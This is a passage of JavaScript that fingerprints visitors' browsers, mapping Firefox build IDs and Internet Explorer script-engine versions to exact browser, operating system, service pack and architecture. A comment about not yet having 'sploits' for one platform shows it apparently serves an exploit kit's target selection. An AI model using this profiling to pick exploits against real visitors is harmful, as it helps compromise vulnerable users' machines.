ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86; break; case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break; } break; case "2009102815": switch (navigator.productSub) { case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "20091029152254": ua_version = "3.6.0.b1"; os_name = oses_linux; break; case "20091029171059": ua_version = "3.6.0.b1"; os_name = oses_windows; break; case "20091102134505": ua_version = "3.5.5"; os_name = oses_mac_osx; break; case "20091102141836": ua_version = "3.5.5"; os_name = oses_linux; break; case "20091102152451": ua_version = "3.5.5"; os_name = oses_windows; break; case "2009110421": ua_version = "3.0.15"; os_name = oses_freebsd; arch = arch_x86; break; case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20091108163911": ua_version = "3.6.0.b2"; os_name = oses_linux; break; case "20091108181924": ua_version = "3.6.0.b2"; os_name = oses_windows; break; case "20091109125225": switch (navigator.productSub) { case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20091115172547": ua_version = "3.6.0.b3"; os_name = oses_linux; break; case "20091115182845": ua_version = "3.6.0.b3"; os_name = oses_windows; break; case "20091124201530": ua_version = "3.6.0.b4"; os_name = oses_mac_osx; break; case "20091124201751": ua_version = "3.6.0.b4"; os_name = oses_linux; break; case "20091124213835": ua_version = "3.6.0.b4"; os_name = oses_windows; break; case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20091201203240": ua_version = "3.5.6"; os_name = oses_mac_osx; break; case "20091201204959": ua_version = "3.5.6"; os_name = oses_linux; break; case "20091201220228": ua_version = "3.5.6"; os_name = oses_windows; break; case "2009120206": ua_version = "3.0.16"; break; // Can be either Mac or Linux case "2009120208": ua_version = "3.0.16"; os_name = oses_windows; break; case "20091204132459": ua_version = "3.6.0.b5"; os_name = oses_linux; break; case "20091204132509": ua_version = "3.6.0.b5"; os_name = oses_mac_osx; break; case "20091204143806": ua_version = "3.6.0.b5"; os_name = oses_windows; break; case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20091215231754": switch (navigator.productSub) { case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 } break; case "2009121601": switch (navigator.productSub) { case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // Could also be Mint x86-64 } break; case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Mandriva"; break; case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break; case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break; case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break; case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break; case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break; case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break; case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break; case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break; case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Mandriva"; break; case "20100115132715": ua_version = "3.6.0"; os_name = oses_mac_osx; break; case "20100115133306": ua_version = "3.6.0"; os_name = oses_linux; break; case "20100115144158": ua_version = "3.6.0"; os_name = oses_windows; break; case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86 case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "20100202152834": ua_version = "3.5.8"; os_name = oses_mac_osx; break; case "20100202153512": ua_version = "3.5.8"; os_name = oses_linux; break; case "20100202165920": ua_version = "3.5.8"; os_name = oses_windows; break; case "2010020219": ua_version = "3.0.18"; os_name = oses_mac_osx; break; case "2010020220": ua_version = "3.0.18"; os_name = oses_windows; break; case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010031218": ua_version = "3.0.19"; break; // Mac OS X or Linux case "2010031422": ua_version = "3.0.19"; os_name = oses_windows; break; case "20100315075757": ua_version = "3.5.9"; os_name = oses_linux; break; case "20100315080228": ua_version = "3.5.9"; os_name = oses_mac_osx; break; case "20100315083431": ua_version = "3.5.9"; os_name = oses_windows; break; case "20100316055951": ua_version = "3.6.2"; os_name = oses_mac_osx; break; case "20100316060223": ua_version = "3.6.2"; os_name = oses_linux; break; case "20100316074819": ua_version = "3.6.2"; os_name = oses_windows; break; case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100401064631": ua_version = "3.6.3"; os_name = oses_mac_osx; break; case "20100401074458": ua_version = "3.6.3"; os_name = oses_linux; break; case "20100401080539": ua_version = "3.6.3"; os_name = oses_windows; break; case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break; case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break; case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20100413152922": ua_version = "3.6.4.b1"; os_name = oses_mac_osx; break; case "20100413154310": ua_version = "3.6.4.b1"; os_name = oses_linux; break; case "20100413172113": ua_version = "3.6.4.b1"; os_name = oses_windows; break; case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100502202326": ua_version = "3.6.4.b2"; os_name = oses_linux; break; case "20100502202401": ua_version = "3.6.4.b2"; os_name = oses_mac_osx; break; case "20100502221517": ua_version = "3.6.4.b2"; os_name = oses_windows; break; case "20100503113315": ua_version = "3.6.4.b3"; os_name = oses_mac_osx; break; case "20100503113541": ua_version = "3.6.4.b3"; os_name = oses_linux; break; case "20100503122926": ua_version = "3.6.4.b3"; os_name = oses_windows; break; case "20100504085637": ua_version = "3.5.10"; os_name = oses_linux; break; case "20100504085753": ua_version = "3.5.10"; os_name = oses_mac_osx; break; case "20100504093643": ua_version = "3.5.10"; os_name = oses_windows; break; case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "SUSE"; break; case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100513134853": ua_version = "3.6.4.b4"; os_name = oses_mac_osx; break; case "20100513140540": ua_version = "3.6.4.b4"; os_name = oses_linux; break; case "20100513144105": ua_version = "3.6.4.b4"; os_name = oses_windows; break; case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100523180910": ua_version = "3.6.4.b5"; os_name = oses_mac_osx; break; case "20100523181754": ua_version = "3.6.4.b5"; os_name = oses_linux; break; case "20100523185824": ua_version = "3.6.4.b5"; os_name = oses_windows; break; case "20100527084110": ua_version = "3.6.4.b6"; os_name = oses_mac_osx; break; case "20100527085242": ua_version = "3.6.4.b6"; os_name = oses_linux; break; case "20100527093236": ua_version = "3.6.4.b6"; os_name = oses_windows; break; case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20100611134546": ua_version = "3.6.4.b7"; os_name = oses_mac_osx; break; case "20100611135942": ua_version = "3.6.4.b7"; os_name = oses_linux; break; case "20100611143157": ua_version = "3.6.4.b7"; os_name = oses_windows; break; case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break; case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86_64; break; case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100625222733": ua_version = "3.6.6"; os_name = oses_linux; break; case "20100625223402": ua_version = "3.6.6"; os_name = oses_mac_osx; break; case "20100625231939": ua_version = "3.6.6"; os_name = oses_windows; break; case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break; case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100630131607": ua_version = "4.0.0.b1"; os_name = oses_mac_osx; break; case "20100630132217": ua_version = "4.0.0.b1"; os_name = oses_linux; break; case "20100630141702": ua_version = "4.0.0.b1"; os_name = oses_windows; break; case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break; case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch) case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch) case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch) case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala) case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000 case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch) case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch) case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala) case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala) case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20120312181643": // It is disconcerting that a buildID is the same on Windows // and Mac, need to examine more versions on Mac. ua_version = "11.0"; if (/Mac/.test(navigator.oscpu)) { os_name = oses_mac_osx; } else { os_name = oses_windows; // browsershots: Firefox 11.0 / Windows XP } break; case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch) case "20120423142301": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20120424151700": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Fedora"; break; default: version = this.searchVersion("Firefox", navigator.userAgent); // Verify whether the ua string is lying by checking if it contains // the major version we detected using known objects above. If it // appears to be truthful, then use its more precise version number. if (version && version.split(".")[0] == ua_version.split(".")[0]) { // The version number will sometimes end with a space or end of // line, so strip off anything after a space if one exists if (-1 != version.indexOf(" ")) { version = version.substr(0,version.indexOf(" ")); } ua_version = version; } else { ua_is_lying = true; } break; } //if (ua_is_lying) { alert("UA is lying"); } //alert(ua_version + " vs " + navigator.userAgent); // end navigator.buildID checks } else if (typeof ScriptEngineMajorVersion == "function") { // Then this is IE and we can very reliably detect the OS. // Need to add detection for IE on Mac. Low priority, since we // don't have any sploits for it yet and it's a very low market // share. os_name = oses_windows; ua_name = clients_ie; version = ScriptEngineMajorVersion().toString(); version += ScriptEngineMinorVersion().toString(); version += ScriptEngineBuildVersion().toString(); //document.write("ScriptEngine: "+version+"<br />"); switch (version){ case "514615": // IE 5.00.2920.0000, 2000 Advanced Server SP0 English ua_version = "5.0"; os_flavor = "2000"; os_sp = "SP0"; break; case "515907": os_flavor = "2000"; os_sp = "SP3"; //or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109 break; case "518513": os_flavor = "2000"; os_sp = "SP4"; break; case "566626": // IE 6.0.2600.0000, XP SP0 English // IE 6.0.2800.1106, XP SP1 English ua_version = "6.0"; os_flavor = "XP"; os_sp = "SP0"; break; case "568515": // IE 6.0.3790.0, 2003 Standard SP0 English ua_version = "6.0"; os_flavor = "2003"; os_sp = "SP0"; break; case "568820": // IE 6.0.2900.2180, xp sp2 english os_flavor = "XP"; os_sp = "SP2"; break; case "568827": os_flavor = "2003"; os_sp = "SP1"; break; case "568831": //XP SP2 -OR- 2K SP4 if (os_flavor == "2000"){ os_sp = "SP4"; } else{ os_flavor = "XP"; os_sp = "SP2"; } break; case "568832": os_flavor = "2003"; os_sp = "SP2"; break; case "568837": // IE 6.0.2900.2180, XP Professional SP2 Korean ua_version = "6.0"; os_flavor = "XP"; os_sp = "SP2"; break; case "5716599": // IE 7.0.5730.13, XP Professional SP3 English // IE 6.0.2900.5512, XP Professional SP3 English // IE 6.0.2900.5512, XP Professional SP3 Spanish // // Since this scriptengine applies to more than one major version of // IE, rely on the object detection below to determine ua_version. //ua_version = "6.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "575730": // IE 7.0.5730.13, Server 2003 Standard SP2 English // IE 7.0.5730.13, Server 2003 Standard SP1 English // IE 7.0.5730.13, XP Professional SP2 English // Rely on the user agent matching above to determine the OS. // This will incorrectly identify 2k3 SP1 as SP2 ua_version = "7.0"; os_sp = "SP2"; break; case "5718066": // IE 7.0.5730.13, XP Professional SP3 English ua_version = "7.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "5722589": // IE 7.0.5730.13, XP Professional SP3 English ua_version = "7.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "576000": // IE 7.0.6000.16386, Vista Ultimate SP0 English ua_version = "7.0"; os_flavor = "Vista"; os_sp = "SP0"; break; case "580": // IE 8.0.7100.0, Windows 7 English // IE 8.0.7100.0, Windows 7 64-bit English case "5816385": // IE 8.0.7600.16385, Windows 7 English case "5816475": case "5816762": // IE 8.0.7600.16385, Windows 7 English ua_version = "8.0"; os_flavor = "7"; os_sp = "SP0"; break; case "5817514": // IE 8.0.7600.17514, Windows 7 SP1 English ua_version = "8.0"; os_flavor = "7"; os_sp = "SP1"; break; case "5818702": // IE 8.0.6001.18702, XP Professional SP3 English case "5822960": // IE 8.0.6001.18702, XP Professional SP3 Greek ua_version = "8.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "9016406": // IE 9.0.7930.16406, Windows 7 64-bit ua_version = "9.0"; os_flavor = "7"; os_sp = "SP0"; break; case "9016441": // IE 9.0.8112.16421, Windows 7 32-bit English ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016443": // IE 9.0.8112.16421, Windows 7 Polish // Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016446": // IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988) // Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2) ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016464": // browsershots.org, MSIE 7.0 / Windows 2008 R2 os_flavor = "2008R2"; ua_version = "9.0"; break; case "9016470": // IE 9.0.8112.16421 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016502": // IE 9.0.8112.16502 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016506": // IE 9.0.8112.16506 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016514": // IE 9.0.8112.16514 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016520": // IE 9.0.8112.16520 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016526": // IE 9.0.8112.16526 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016533": // IE 9.0.8112.16533 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "10016720": // IE 10.0.9200.16721 / Windows 7 SP1 ua_version = "10.0"; os_flavor = "7"; os_sp = "SP1"; break; case "11016428": // IE 11.0.9600.16428 / Windows 7 SP1 ua_version = "11.0"; os_flavor = "7"; os_sp = "SP1"; break; case "10016384": // IE 10.0.9200.16384 / Windows 8 x86 ua_version = "10.0"; os_flavor = "8"; os_sp = "SP0"; break; case "1000": // IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release ua_version = "10.0"; os_flavor = "8"; os_sp = "SP0"; break; default: unknown_fingerprint = version; break; } if (!ua_version) { // The ScriptEngine functions failed us, try some object detection if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") { // IE 11 detection, see: Compatibility changes in IE11 (Windows) try { if (document.__proto__ != undefined) { ua_version = "11.0"; } } catch (e) {} // IE 10 detection using nodeName if (!ua_version) { try { var badNode = document.createElement && document.createElement("badname"); if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; } } catch(e) {} } // IE 9 detection based on a "Object doesn't support property or method" error if (!ua_version) { try { document.BADNAME(); } catch(e) { if (e.message.indexOf("BADNAME") > 0) { ua_version = "9.0"; } } } // IE8 detection straight from IEBlog. Thank you Microsoft. if (!ua_version) { try { ua_version = "8.0"; document.documentElement.style.display = "table-cell"; } catch(e) { // This executes in IE7, // but not IE8, regardless of mode ua_version = "7.0"; } } } else if (document.compatMode) { ua_version = "6.0"; } else if (window.createPopup) { ua_version = "5.5"; } else if (window.attachEvent) { 